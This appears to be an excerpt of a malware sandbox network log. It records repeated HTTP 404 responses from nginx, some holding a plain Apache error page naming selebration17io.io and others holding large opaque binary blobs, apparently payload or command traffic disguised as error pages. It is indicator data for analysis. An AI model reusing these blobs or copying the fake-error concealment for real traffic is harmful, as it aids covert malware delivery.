                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:07:56 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:07:56 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:07:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 cd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c6 13 dc 19 df 8c ca 70 73 dc 31 bc af 4f ed 7f 40 93 d9 5e 6f 71 00 76 b9 3b 50 fd 96 bf eb bf 3a fc bb c9 27 97 8f c8 d4 60 66 b0 06 bd 89 72 e9 ac 67 f3 40 ee e5 a4 78 ee 09 b5 8f 36 03 cf 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 bd 40 70 b1 5b 23 5c 4a 8a f4 e9 5a 15 21 0b 5a a3 06 93 3a b6 3f c8 01 28 bf 48 15 d7 d9 53 53 fa 79 1a 9e 1d 09 52 2b 05 50 83 7b 7e 55 f7 ff 78 8d 54 db c4 0d 53 13 bf 0e e1 92 24 0a 4f c5 06 a1 ca a1 61 7e de f5 6c b9 18 17 7e 5f af 9a a5 b4 cf a0 c1 bd dd 7a e8 2b 48 19 e2 2c d5 2c 18 1a e5 96 be 35 51 61 9a d4 2e 7c 88 38 c8 48 6b a1 c0 4a 8a 03 fd ec 9e aa 7b ac 87 2f bd 61 81 cf 5c bf ca 34 fd f8 12 8c 35 6c c9 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae cc 95 03 4c 69 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cd 46 e1 4a 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 06 f0 27 38 03 9b c7 9b 4f 06 3d 66 f1 9a 64 b1 1d ee 12 51 8c 74 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 6e a1 54 35 8b fc d3 7a 1b a2 cb 29 37 08 e7 5b 1e 54 aa 1e 26 61 11 ee c3 2c 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 6c 5e ae 43 75 81 7e 90 c7 7d 10 9f 30 1d dc b0 99 37 98 8a cd 70 7a 74 79 ae 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a 
b1 ae 46 1f 30 a0 aa 7a 8f 16 6d e3 cd d2 d9 37 00 12 e5 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:07:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 61 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 fd e2 aa 20 e4 7d bc 49 48 2d 47 85 94 be 9b 46 86 20 a9 66 23 81 76 4f ff b3 fb c4 ff 4e 9d 86 ba 69 59 f0 d7 67 f9 f1 3d ca 14 88 78 4d ff 4b 98 02 17 cb 18 1e 93 9d 2e 10 0f 68 45 c7 75 f6 54 e3 30 13 92 8e e3 e0 21 2e 34 ee 64 2d b7 65 14 97 13 04 87 5b f6 ff bb 52 33 8b f8 58 a5 ef c1 7f 3c 8f 08 46 65 b5 83 2b 22 a0 ac 7e fd e6 3a 75 78 2b 04 70 fc 9e 84 8c f2 ce 6b 3d 59 4a 81 1f 37 6e 46 75 bd a6 b3 3a 4e 26 e1 71 e1 70 c3 1f ac 14 c2 06 70 40 64 b6 29 a2 ec 27 01 2f ce 45 e4 15 45 c0 73 cf f4 02 2e ac 93 55 3b 1c a8 38 5f 22 cd 5d ff d4 6d f3 91 c8 7f 51 66 fd db 83 6a fe 51 7a 53 59 92 8e d0 18 96 57 13 d4 6c c1 13 0a 34 4c 53 4d 40 05 50 04 4b 05 a4 38 c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 25 13 ad f3 1b 3a 2f b9 30 bd 08 46 b2 75 0e 31 79 92 90 f7 3f f5 ee c6 79 2a 45 87 d0 32 e3 13 63 71 ba d6 af 31 3c 27 f4 48 b7 9f 33 d9 cc 46 d9 78 0f ac af eb 99 55 3d bf ba 68 92 1e ff 9d 7a 7f 55 40 57 64 7b 39 63 e7 ac 04 28 84 42 40 77 0b dc 9b 84 f7 3d 66 f1 8a 64 b1 1f 30 12 d1 8c 70 07 4b 81 7b df 8e 82 01 f8 e4 1f 4e a1 90 4e a1 54 55 b5 8e b7 1b 6f c3 cb 29 32 28 e7 5b a2 1e b1 1e 5a 7c 11 ee c3 ee 4c a3 f4 1e 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 4d 0b 9f 08 84 d9 b0 c9 35 83 8a 99 e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 
d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 b0 f9 1c d9 22 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca ac bb 40 56 eb 96 ce ec e5 8b d9 a7 0d b8 ca d4 5f 09 59 43 9c 45 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 05 7d da c9 ed 9a ac 4e bf 83 09 e8 05 04 1e ac 18 88 6d b3 0e a3 81 19 13 b8 a3 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 05 e1 f0 33 a3 27 b8 99 66 b2 52 dc 7e 28 8b 18 57 41 1b 7d 42 a3 81 96 7f b8 34 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 e2 25 1f b8 4e 4a 43 2d b5 a6 b8 78 46 b2 8e 98 6d 38 45 32 d0 f9 f3 32 42 c2 22 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d 9b 10 54 1a 39 6e 39 36 79 d0 19 5f 57 da 69 f9 e4 09 31 01 6e 91 fd 58 b3 cc 8e 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 82 01 6d 3c d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:08:00 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 33 34 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1c 86 09 9f 47 c7 f8 01 b5 20 f0 3e 0b 5a 38 fd 29 00 65 98 59 66 1b 7d d7 e2 89 bd cc 6a c1 7e 2f 0d 0a 30 0d 0a 0d 0a | Data Ascii: 34Uys/~(`:G >Z8)eYf}j~/0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:08:04 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 34 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a4 4e f2 7b a9 64 14 00 78 a2 3e 5c 67 d8 0f 2b 09 7a 80 f5 d3 ed d7 70 97 3f 2e 5e 61 be b4 bf f7 5a 6e 94 2b 7b be d5 d4 3f a6 55 70 fb 0d 0a 30 0d 0a 0d 0a | Data Ascii: 47Uys/~(`:LDN{dx>\g+zp?.^aZn+{?Up0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 08 Feb 2024 18:08:10 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 09 87 1c c1 57 9c f5 0f ae 66 f2 22 40 5a 3c bf 6f 0a 60 89 40 67 1b 71 c1 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2cUys/~(`:Wf"@Z<o`@gq0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 2d 5b e3 1b 34 c4 f5 72 98 94 0e be 44 07 d2 7d ae b1 4f 5c b8 39 3f 74 3d 05 f0 ff 6c f7 d4 bd 0c de 3e cb 96 df b0 ca 36 50 ca b2 e7 f5 b6 70 ba e2 5f f1 cb a6 da a6 f7 31 22 53 65 7e 3c cd cc ea 2e 28 7e 36 aa db b9 27 2e d5 4e 95 fe 5e bf 6c 13 d9 a5 e2 bf c4 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 5b 53 90 dc 84 fd 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5f db c4 29 11 13 bf 2a 9a 90 24 08 4f c5 a5 b5 cb a1 61 6e de f5 69 f9 1b 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4f 19 e0 2c 95 a9 1d 1a f4 96 be 25 51 61 9a a4 43 7e 88 2c c8 48 d2 a2 c3 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf e8 f7 1a 54 9b 4a d8 19 fe b1 4d 0b 65 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb ac ce 46 c1 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 24 79 39 ea e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 6d 7c a3 90 4e b1 54 55 a5 aa b5 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 30 18 06 f1 2c 1e ac 03 5b d7 1f e4 a6 55 12 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 1c 0d b9 e2 2b 29 b6 bb 01 64 17 28 
